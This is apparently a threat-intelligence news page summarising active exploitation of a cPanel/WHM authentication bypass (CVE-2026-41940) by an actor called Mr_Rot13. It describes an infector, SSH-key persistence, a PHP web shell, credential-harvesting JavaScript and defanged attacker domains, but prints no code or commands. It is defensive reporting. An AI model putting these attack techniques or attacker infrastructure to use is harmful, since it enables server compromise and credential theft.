CyberHappenings logo
Home Browse Watchlists Experimental About

Track cybersecurity events as they unfold. Sourced timelines. Filter, sort, and browse. Fast, privacy‑respecting. No invasive ads, no tracking.

Active exploitation of cPanel authentication bypass (CVE-2026-41940) delivering Filemanager backdoor

First reported
Last updated
1 unique sources, 1 articles

Summary

Hide ▲

A threat actor identified as Mr_Rot13 is actively exploiting CVE-2026-41940, a critical authentication bypass vulnerability in cPanel and WebHost Manager (WHM), to deploy a backdoor named Filemanager across compromised environments. The flaw enables remote attackers to gain elevated control of cPanel instances, leading to post-exploitation activities including cryptocurrency mining, ransomware deployment, botnet propagation, and persistent backdoor implantation. The attack chain involves shell scripts fetching a Go-based infector from cp.dene.[de[.]com, which installs an SSH public key for persistence, drops a PHP web shell for remote command execution, and injects JavaScript into login pages to harvest credentials via a ROT13-encoded domain (wrned[.]com). The final payload is a cross-platform backdoor capable of infecting Windows, macOS, and Linux systems.

Timeline

  1. 11.05.2026 20:54 1 articles · 2h ago

    Mr_Rot13 exploits cPanel authentication bypass (CVE-2026-41940) to deploy Filemanager backdoor

    Active exploitation of CVE-2026-41940 by threat actor Mr_Rot13 began shortly after public disclosure, with observed campaigns delivering a Go-based infector that implants persistence mechanisms (SSH public key), a PHP web shell for remote operations, and a cross-platform Filemanager backdoor. The backdoor supports file management, remote command execution, and data collection, including credentials and host information, exfiltrated to attacker-controlled domains and a Telegram group.

    Show sources
    Open in new tab

Information Snippets